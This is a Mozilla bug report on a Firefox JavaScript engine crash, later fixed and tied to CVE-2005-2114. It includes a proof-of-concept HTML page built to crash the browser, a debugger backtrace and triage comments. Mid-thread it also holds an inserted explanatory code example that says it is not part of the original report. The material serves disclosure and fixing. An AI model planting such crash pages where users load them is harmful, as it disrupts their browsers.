Bug 299816 (Closed)
Opened 19 years ago
Closed 19 years ago
Crashes when executing javascript with for cycle to 20000 calling function(){}; in another function
Categories: Core :: JavaScript Engine, defect
Tracking: VERIFIED FIXED
People: Reporter: ras_algeti, Unassigned
Details: Keywords: fixed-aviary1.0.5, fixed1.7.9; Whiteboard: fixed by bug 299209
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Firefox crashes when clicking a button with a javascript: action. It calls the function
CrashFirefox(), which contains a for cycle (1 to 20000) calling a function with no
name and no parameters.
Sample Code:
<html>
<head>
<title>Mozilla JavaScript Crash Issue: Proof-of-Concept</title>
</head>
<body>
<form name="Form1" action="javascript:CrashFirefox();">
<br>
To crash your browser, click on the button.<br>
<br>
<input type="submit" value=" Go " name="ButtonStart" style="font-family:
Trebuchet MS; font-size: 10pt; color: #333333; text-decoration:none"><br>
</form>
<script language="JavaScript">
function CrashFirefox()
{
for (n = 0; n <= 20000; n++)
{
function(){};
}
alert("Good news - Your browser is not vulnerable.");
}
</script>
</body>
</html>
Reproducible: Always
Steps to Reproduce:
1. Open the sample page.
2. Click the "Go" button.
3. Firefox crashes.
Actual Results:
Firefox crashes.
Expected Results:
The cycle ends and Firefox does not crash.
Updated•19 years ago
Status: UNCONFIRMED → NEW
Component: General → JavaScript Engine
Ever confirmed: true
OS: Windows NT → All
Product: Firefox → Core
Hardware: PC → All
Version: unspecified → Trunk
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050706
Firefox/1.0+ ID:2005070601
Error: CrashFirefox is not defined
Source File: javascript:CrashFirefox();
Line: 1
And once I put the script part in the HEAD then I get a syntax error on
function(){};
Comment 2•19 years ago
On a week old trunk build (hm, time to rebuild) I get this:

Document http://195.138.144.145/crashmozilla.htm loaded successfully
Program received signal SIGSEGV, Segmentation fault.
0xfeff4a4c in JS_HashTableRawLookup (ht=0xba530, keyHash=2375682, key=0x910008) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:179
179         if (he->keyHash == keyHash && ht->keyCompare(key, he->key)) {
Current language: auto; currently c
(gdb) bt
#0 0xfeff4a4c in JS_HashTableRawLookup (ht=0xba530, keyHash=2375682, key=0x910008) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:179
#1 0xfeff4e28 in JS_HashTableAdd (ht=0xba530, key=0x910008, value=0x90f2f8) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:257
#2 0xfe4ba31c in _createJSDObject (jsdc=0xaa7b8, cx=0x6aadb8, obj=0x910008) at /home/anlan/scratch/m8/mozilla/js/jsd/jsd_obj.c:130
#3 0xfe4ba4d8 in jsd_ObjectHook (cx=0x6aadb8, obj=0x910008, isNew=1, closure=0xaa7b8) at /home/anlan/scratch/m8/mozilla/js/jsd/jsd_obj.c:171
#4 0xff02ea38 in js_NewObject (cx=0x6aadb8, clasp=0xff0d50d0, proto=0x6f2268, parent=0x6abca0) at /home/anlan/scratch/m8/mozilla/js/src/jsobj.c:1920
#5 0xfefefd48 in js_CloneFunctionObject (cx=0x6aadb8, funobj=0x6f2268, parent=0x6abca0) at /home/anlan/scratch/m8/mozilla/js/src/jsfun.c:1969
#6 0xff013e58 in js_Interpret (cx=0x6aadb8, pc=0x794caa "\200", result=0xffbfb750) at /home/anlan/scratch/m8/mozilla/js/src/jsinterp.c:4391
#7 0xfeff8dd0 in js_Execute (cx=0x6aadb8, chain=0x6abca0, script=0x811880, down=0x0, flags=0, result=0xffbfb8b8) at /home/anlan/scratch/m8/mozilla/js/src/jsinterp.c:1408
#8 0xfefa87e4 in JS_EvaluateUCScriptForPrincipals (cx=0x6aadb8, obj=0x6abca0, principals=0x74016c, chars=0xffbfb988, length=15,
Comment 3•19 years ago
week-old, sure; current trunk yields syntax error on the js. TB7263433E from 1.0.4 linux.
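Comments 1 and 3 above both hit a syntax error on the line `function(){};` that the week-old build in comment 2 had parsed and executed (reaching js_CloneFunctionObject from the interpreter loop). The following is an added example, not code from the bug report or from Mozilla: it compiles the reporter's loop body with the Function constructor to show that an anonymous function in statement position is rejected as a SyntaxError (a function declaration needs a name), and that wrapping it in parentheses turns it into a function expression, so the loop then really does create one distinct function object per iteration, which is the behaviour the testcase was meant to exercise. The helper names `compileCheck` and `countDistinctFunctions` are this example's own.

```javascript
'use strict';

// The reporter's original loop body, verbatim from the bug's sample code.
// `function(){};` in statement position is a function *declaration* with no
// name, which the parser rejects.
const ORIGINAL_BODY = 'for (n = 0; n <= 20000; n++) { function(){}; }';

// Same loop with the anonymous function turned into an expression statement
// by parenthesising it. Each iteration now evaluates to a fresh function
// object; they are collected so the caller can verify none are shared.
const FIXED_BODY =
  'const made = []; ' +
  'for (let n = 0; n <= 20000; n++) { made.push((function(){})); } ' +
  'return made;';

// Compile a function body without running it and classify the outcome.
// Returns { parses: true, error: null } or { parses: false, error: <name> }.
function compileCheck(body) {
  try {
    new Function(body);
    return { parses: true, error: null };
  } catch (e) {
    return { parses: false, error: e.name };
  }
}

// Run a body that returns an array of function objects and count how many
// distinct objects it produced (Set dedupes by identity, so 20001 here means
// the engine allocated a new function object on every iteration).
function countDistinctFunctions(body) {
  const made = new Function(body)();
  return new Set(made).size;
}

function report() {
  const orig = compileCheck(ORIGINAL_BODY);
  const fixed = compileCheck(FIXED_BODY);
  console.log('original body: ' + (orig.parses ? 'parses' : 'rejected with ' + orig.error));
  console.log('fixed body:    ' + (fixed.parses ? 'parses' : 'rejected with ' + fixed.error));
  if (fixed.parses) {
    console.log('distinct function objects created: ' + countDistinctFunctions(FIXED_BODY));
  }
}

report();
```

Run it with any modern JavaScript engine (for example `node`). The original body is reported as a SyntaxError, matching what comments 1 and 3 saw on trunk, while the parenthesised form parses and yields 20001 distinct function objects, one per loop iteration.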
Comment 4•19 years ago
WFM with Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050705 SeaMonkey/1.0a Mnenhy/0.7.2.10005 and Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050705 Firefox/1.0+ no crash
*** This bug has been marked as a duplicate of 299209 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
Updated•19 years ago
Status: RESOLVED → VERIFIED
Comment 6•19 years ago
This is a public vulnerability, need a public bug to catch dupes. Original bug 299209 was marked sensitive when discussion wandered to other topics.
Status: VERIFIED → REOPENED
Resolution: DUPLICATE → ---
Comment 7•19 years ago
Fixed by patch in bug 299209, on trunk and branches.
Status: REOPENED → RESOLVED
Closed: 19 years ago → 19 years ago
Depends on: CVE-2005-2114
Keywords: fixed-aviary1.0.5,
fixed1.7.9
Resolution: --- → FIXED
Whiteboard: fixed by bug 299209
Updated•19 years ago
Flags: testcase+
Comment 10•19 years ago
(In reply to comment #7)
> Fixed by patch in bug 299209, on trunk and branches.

How can I get a patch for this problem, since 299209 is marked as private?
Comment 11•19 years ago
christopher.grant@tss.teleca.se: if you are a vendor that needs access to specific patch sets you could contact mozilla.org or the security group. but most people can just download newer versions. note that our cvs repository is public and there's a powerful web interface, so it's not like you couldn't find the changes....